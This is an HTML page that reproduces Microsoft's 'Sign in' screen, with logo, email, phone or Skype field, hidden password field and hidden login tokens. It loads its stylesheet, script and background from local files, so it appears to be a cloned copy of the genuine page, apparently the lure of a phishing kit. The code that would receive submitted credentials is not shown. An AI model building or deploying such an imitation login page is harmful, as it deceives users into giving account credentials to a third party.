<head>
  <link rel="stylesheet" href="microsoft.css"></link>
</head>
<script src="page.js"></script>
<body style="background-image: url('msbackground.svg')">
  <div class="win-scroll">
              <div
                id="lightbox"
                class="sign-in-box ext-sign-in-box has-popup"
              >
                <!-- ko template: { nodes: $masterPageContext.$componentTemplateNodes, data: $page } -->

                <!-- ko if: svr.Bx --><!-- /ko -->

                <div
                  class="lightbox-cover"
                  data-bind="css: { 'disable-lightbox': svr.CE &amp;&amp; showLightboxProgress() }"
                ></div>

                <!-- ko if: showLightboxProgress --><!-- /ko -->

                <!-- ko if: loadBannerLogo -->
                <div
                  data-bind="component: { name: 'logo-control',
  params: {
      isChinaDc: svr.fIsChinaDc,
      bannerLogoUrl: bannerLogoUrl() } }"
                >
                  <!--  -->

                  <!-- ko if: bannerLogoUrl --><!-- /ko -->

                  <!-- ko if: svr.fUseNonMicrosoftDefaultBrandingForCiam --><!-- /ko -->

                  <!-- ko ifnot: svr.fUseNonMicrosoftDefaultBrandingForCiam -->
                  <!-- ko if: !bannerLogoUrl && !isChinaDc -->
                  <!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko -->
                  <!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme -->
                  <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img
                    class="logo"
                    role="img"
                    pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9.png"
                    svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
                    data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }"
                    src="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
                    alt="Microsoft"
                  /><!-- /ko -->
                  <!-- /ko --><!-- /ko -->
                  <!-- /ko -->
                  <!-- /ko -->
                </div>
                <!-- /ko -->

                <!-- ko if: svr.Dh && paginationControlHelper.showLwaDisclaimer() --><!-- /ko -->

                <!-- ko if: asyncInitReady -->
                <div
                  role="main"
                  data-bind="component: { name: 'pagination-control',
  publicMethods: paginationControlMethods,
  params: {
      enableCssAnimation: svr.a7,
      disableAnimationIfAnimationEndUnsupported: svr.Ck,
      initialViewId: initialViewId,
      currentViewId: currentViewId,
      initialSharedData: initialSharedData,
      initialError: $loginPage.getServerError() },
  event: {
      cancel: paginationControl_onCancel,
      load: paginationControlHelper.onLoad,
      unload: paginationControlHelper.onUnload,
      loadView: view_onLoadView,
      showView: view_onShow,
      setLightBoxFadeIn: view_onSetLightBoxFadeIn,
      animationStateChange: paginationControl_onAnimationStateChange } }"
                >
                  <!--  -->

                  <div
                    data-bind="css: { 'zero-opacity': hidePaginatedView() }"
                    class=""
                  >
                    <!-- ko if: showIdentityBanner() && (sharedData.displayName || svr.i) --><!-- /ko -->

                    <div
                      class="pagination-view animate slide-in-next"
                      data-bind="css: {
  'has-identity-banner': showIdentityBanner() &amp;&amp; (sharedData.displayName || svr.i),
  'zero-opacity': hidePaginatedView.hideSubView(),
  'animate': animate(),
  'slide-out-next': animate.isSlideOutNext(),
  'slide-in-next': animate.isSlideInNext(),
  'slide-out-back': animate.isSlideOutBack(),
  'slide-in-back': animate.isSlideInBack() }"
                    >
                      <!-- ko foreach: views -->
                      <!-- ko if: $parent.currentViewIndex() === $index() -->
                      <!-- ko template: { nodes: [$data], data: $parent } -->
                      <div
                        data-viewid="1"
                        data-showfedcredbutton="true"
                        data-bind="pageViewComponent: { name: 'login-paginated-username-view',
      params: {
          serverData: svr,
          serverError: initialError,
          isInitialView: isInitialState,
          displayName: sharedData.displayName,
          otherIdpRedirectUrl: sharedData.otherIdpRedirectUrl,
          prefillNames: $loginPage.prefillNames,
          flowToken: sharedData.flowToken,
          availableSignupCreds: sharedData.availableSignupCreds,
          customStrings: $loginPage.customStrings(),
          isCustomizationFailure: $loginPage.isCustomStringsLoadFailure() },
      event: {
          redirect: $loginPage.view_onRedirect,
          setPendingRequest: $loginPage.view_onSetPendingRequest,
          registerDialog: $loginPage.view_onRegisterDialog,
          unregisterDialog: $loginPage.view_onUnregisterDialog,
          showDialog: $loginPage.view_onShowDialog,
          updateAvailableCredsWithoutUsername: $loginPage.view_onUpdateAvailableCreds,
          agreementClick: $loginPage.footer_agreementClick } }"
                      >
                        <!--  -->

                        <!-- ko if: svr.fAllowLoginTextCustomizations -->
                        <div
                          data-bind="component: { name: 'header-control',
  params: {
  serverData: svr,
  title: customTitle() || str['WF_STR_HeaderDefault_Title'],
  headerDescription: customDescription() } }"
                        >
                          <div>
                            <div
                              class="row title ext-title"
                              id="loginHeader"
                              data-bind="externalCss: { 'title': true }"
                            >
                              <div
                                id="hdlabel"
                                role="heading"
                                aria-level="1"
                                data-bind="text: title"
                              >
                                Sign in
                              </div>
                              <!-- ko if: isSubtitleVisible --><!-- /ko -->
                            </div>

                            <!-- ko if: headerDescription --><!-- /ko -->
                          </div>
                        </div>
                        <!-- /ko -->

                        <!-- ko ifnot: svr.fAllowLoginTextCustomizations --><!-- /ko -->

                        <!-- ko if: pageDescription && !svr.CO --><!-- /ko -->

                        <div class="row">
                          <div role="alert" aria-live="assertive">
                            <!-- ko if: usernameTextbox.error --><!-- /ko -->
                          </div>

                          <div class="form-group col-md-24">
                            <!-- ko if: prefillNames().length > 1 --><!-- /ko -->

                            <!-- ko ifnot: prefillNames().length > 1 -->
                            <div
                              class="placeholderContainer"
                              data-bind="component: { name: 'placeholder-textbox-field',
  publicMethods: usernameTextbox.placeholderTextboxMethods,
  params: {
      serverData: svr,
      hintText: tenantBranding.unsafe_userIdLabel || str['STR_SSSU_Username_Hint'] || str['CT_PWD_STR_Email_Example'],
      hintCss: 'placeholder' + (!svr.aZ ? ' ltr_override' : '') },
  event: {
      updateFocus: usernameTextbox.textbox_onUpdateFocus } }"
                            >
                              <!-- ko withProperties: { '$placeholderText': placeholderText } -->
                              <!-- ko template: { nodes: $componentTemplateNodes, data: $parent } -->

                              <input
                                type="email"
                                name="loginfmt"
                                id="mail"
                                maxlength="113"
                                class="form-control ltr_override input ext-input text-box ext-text-box"
                                aria-required="true"
                                data-report-event="Signin_Email_Phone_Skype"
                                data-report-trigger="click"
                                data-report-value="Email_Phone_Skype_Entry"
                                data-bind="
          attr: { lang: svr.a1 ? null : 'en' },
          externalCss: {
              'input': true,
              'text-box': true,
              'has-error': usernameTextbox.error },
          ariaLabel: tenantBranding.unsafe_userIdLabel || str['CT_PWD_STR_Username_AriaLabel'],
          ariaDescribedBy: 'loginHeader' + (pageDescription &amp;&amp; !svr.CO ? ' loginDescription usernameError' : ' usernameError'),
          textInput: usernameTextbox.value,
          hasFocusEx: usernameTextbox.focused,
          placeholder: $placeholderText,
          autocomplete: svr.fIsUpdatedAutocompleteEnabled ? 'username' : null,"
                                aria-label="Enter your email, phone, or Skype."
                                aria-describedby="loginHeader usernameError"
                                placeholder="Email, phone, or Skype"
                                data-report-attached="1"
                              />

                              <!-- ko if: svr.fIsUpdatedAutocompleteEnabled -->
                              <input
                                name="passwd"
                                type="password"
                                id="password"
                                data-bind="moveOffScreen, textInput: passwordBrowserPrefill"
                                class="outsideRight"
                                tabindex="-1"
                                aria-hidden="true"
                              />
                              <!-- /ko -->

                              <!-- ko ifnot: svr.fIsUpdatedAutocompleteEnabled --><!-- /ko -->

                              <!-- /ko -->
                              <!-- /ko -->
                              <!-- ko ifnot: usePlaceholderAttribute --><!-- /ko -->
                            </div>
                            <!-- /ko -->
                          </div>
                        </div>

                        <div
                          data-bind="css: { 'position-buttons': !tenantBranding.BoilerPlateText }, externalCss: { 'password-reset-links-container': true }"
                          class="position-buttons password-reset-links-container ext-password-reset-links-container"
                          style="margin-top: 50px"
                        >
                          <div class="row">
                            <div class="col-md-24">
                              <div class="text-13">
                                <!-- ko if: svr.AY && !svr.AI && !svr.a3 -->
                                <!-- ko if: svr.AK --><!-- /ko -->

                                <!-- ko ifnot: svr.AK -->
                                <div
                                  class="form-group"
                                  data-bind="
          htmlWithBindings: html['WF_STR_SignUpLink_Text'],
          childBindings: {
              'signup': {
                  href: svr.j || '#',
                  ariaLabel: svr.j ? str['WF_STR_SignupLink_AriaLabel_Text'] : str['WF_STR_SignupLink_AriaLabel_Generic_Text'],
                  click: signup_onClick } }"
                                >
                                </div>
                                <!-- /ko -->
                                <!-- /ko -->

                                <!-- ko ifnot: hideCantAccessYourAccount --><!-- /ko -->

                                <!-- ko if: showFidoLinkInline && hasFido() && (availableCredsWithoutUsername().length >= 2 || svr.AL || isOfflineAccountVisible) --><!-- /ko -->

                                <!-- ko if: svr.Ba --><!-- /ko -->

                                <!-- ko ifnot: svr.Ba -->
                                <!-- ko if: showCredPicker --><!-- /ko -->
                                <!-- /ko -->

                                <!-- ko if: svr.av --><!-- /ko -->
                              </div>
                            </div>
                          </div>
                        </div>

                        <!-- ko if: svr.cB --><!-- /ko -->

                        <div
                          class="win-button-pin-bottom"
                          data-bind="css : { 'boilerplate-button-bottom': tenantBranding.BoilerPlateText }"
                        >
                          <div
                            class="row"
                            data-bind="css: { 'move-buttons': tenantBranding.BoilerPlateText }"
                          >
                            <div
                              data-bind="component: { name: 'footer-buttons-field',
  params: {
      serverData: svr,
      isPrimaryButtonEnabled: !isRequestPending(),
      isPrimaryButtonVisible: svr.F,
      isSecondaryButtonEnabled: true,
      isSecondaryButtonVisible: svr.F &amp;&amp; isSecondaryButtonVisible(),
      secondaryButtonText: secondaryButtonText() },
  event: {
      primaryButtonClick: primaryButton_onClick,
      secondaryButtonClick: secondaryButton_onClick } }"
                            >
                              <div
                                class="col-xs-24 no-padding-left-right button-container button-field-container ext-button-field-container"
                                data-bind="
  visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
  css: { 'no-margin-bottom': removeBottomMargin },
  externalCss: { 'button-field-container': true }"
                              >
                                <!-- ko if: isSecondaryButtonVisible --><!-- /ko -->

                                <div
                                  data-bind="css: { 'inline-block': isPrimaryButtonVisible }, externalCss: { 'button-item': true }"
                                  class="inline-block button-item ext-button-item"
                                >
                                  <!-- type="submit" is needed in-addition to 'type' in primaryButtonAttributes observable to support IE8 -->
                                  <input
                                    type="submit"
                                    id="nextbtn"
                                    class="win-button button_primary button ext-button primary ext-primary"
                                    data-report-event="Signin_Submit"
                                    data-report-trigger="click"
                                    data-report-value="Submit"
                                    data-bind="
      attr: primaryButtonAttributes,
      externalCss: {
          'button': true,
          'primary': true },
      value: primaryButtonText() || str['CT_PWD_STR_SignIn_Button_Next'],
      hasFocus: focusOnPrimaryButton,
      click: primaryButton_onClick,
      enable: isPrimaryButtonEnabled,
      visible: isPrimaryButtonVisible,
      preventTabbing: primaryButtonPreventTabbing"
                                    value="Next"
                                    data-report-attached="1"
                                  />
                                </div>
                              </div>
                            </div>
                          </div>
                        </div>

                        <!-- ko if: tenantBranding.BoilerPlateText --><!-- /ko -->
                      </div>
                      <!-- /ko -->
                      <!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->

                      <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
                      <!-- /ko -->
                    </div>
                  </div>
                </div>
                <!-- /ko -->

                <input
                  type="hidden"
                  name="ps"
                  data-bind="value: postedLoginStateViewId"
                  value=""
                />
                <input
                  type="hidden"
                  name="psRNGCDefaultType"
                  data-bind="value: postedLoginStateViewRNGCDefaultType"
                  value=""
                />
                <input
                  type="hidden"
                  name="psRNGCEntropy"
                  data-bind="value: postedLoginStateViewRNGCEntropy"
                  value=""
                />
                <input
                  type="hidden"
                  name="psRNGCSLK"
                  data-bind="value: postedLoginStateViewRNGCSLK"
                  value=""
                />
                <!-- ko if: svr.AQ && !svr.fSkipRenderingNewCanaryToken --><!-- /ko -->
                <!-- ko if: !svr.AQ || svr.fSkipRenderingNewCanaryToken -->
                <input
                  type="hidden"
                  name="canary"
                  data-bind="value: svr.canary"
                  value=""
                />
                <!-- /ko -->
                <input
                  type="hidden"
                  name="ctx"
                  data-bind="value: ctx"
                  value=""
                />
                <input
                  type="hidden"
                  name="hpgrequestid"
                  data-bind="value: svr.sessionId"
                  value=""
                />
                <input
                  type="hidden"
                  id="i0327"
                  data-bind="attr: { name: svr.bp }, value: flowToken"
                  name="PPFT"
                  value="DWNuX4BFdjq0y*Re*8DNYLE9w63KlpTIWGTdodQeUHztrLcuKxDtctIPFG97wFuJBFIyV5ZRS2N4ZmoRJXRO1IU91yfcuiknTfzaqAKbDtN0zeLOpTu*H2756UPx695!lPlWOcZ9Bq6OJGQwDmxaT6QL9VzTc6xryoYldUvl1DkClVTbw7sSGRM!x94c3bDcHTe94N5JjqxDY0vVCCYWRyEs6hQ2a2sd!fpoaWX4D5WzCEREX*rsS!N6z3PjiwKA6w$$"
                />
                <input
                  type="hidden"
                  name="PPSX"
                  data-bind="value: svr.Dd"
                  value="Passpo"
                />
                <input type="hidden" name="NewUser" value="1" />
                <input
                  type="hidden"
                  name="FoundMSAs"
                  data-bind="value: svr.Ar"
                  value=""
                />
                <input
                  type="hidden"
                  name="fspost"
                  data-bind="value: svr.fPOST_ForceSignin ? 1 : 0"
                  value="0"
                />
                <input
                  type="hidden"
                  name="i21"
                  data-bind="value: wasLearnMoreShown() ? 1 : 0"
                  value="0"
                />
                <input
                  type="hidden"
                  name="CookieDisclosure"
                  data-bind="value: svr.Bx ? 1 : 0"
                  value="0"
                />
                <input
                  type="hidden"
                  name="IsFidoSupported"
                  data-bind="value: isFidoSupported() ? 1 : 0"
                  value="0"
                />
                <input
                  type="hidden"
                  name="isSignupPost"
                  data-bind="value: isSignupPost() ? 1 : 0"
                  value="0"
                />
                <!-- ko ifnot: svr.fShouldSupportTargetCredentialForRecovery -->
                <input
                  type="hidden"
                  name="isRecoveryAttemptPost"
                  data-bind="value: isRecoveryAttemptPost() ? 1 : 0"
                  value="0"
                />
                <!-- /ko -->
                <!-- ko if: svr.fShouldSupportTargetCredentialForRecovery && targetCredentialForRecovery() --><!-- /ko -->
                <div
                  data-bind="component: { name: 'instrumentation-control',
  publicMethods: instrumentationMethods,
  params: { serverData: svr } }"
                >
                  <input
                    type="hidden"
                    name="i19"
                    data-bind="value: timeOnPage"
                    value=""
                  />
                </div>
                <!-- /ko -->
              </div>

              <!-- ko if: $page.showFedCredAndNewSession -->
              <!-- ko ifnot: svr.fUsePromotedFedCredTypesArray -->
              <!-- ko if: $page.showFedCredButtons -->
              <div
                data-bind="css: { 'app': $page.backgroundLogoUrl }, externalCss: { 'promoted-fed-cred-box': true }"
                class="promoted-fed-cred-box ext-promoted-fed-cred-box"
              >

              <!-- /ko -->
              <!-- /ko -->

              <!-- ko if: svr.fUsePromotedFedCredTypesArray --><!-- /ko -->

              <!-- ko if: $page.newSession --><!-- /ko -->
              <!-- /ko -->

              <!-- ko if: $page.showDebugDetails --><!-- /ko -->
            </div>
</body>
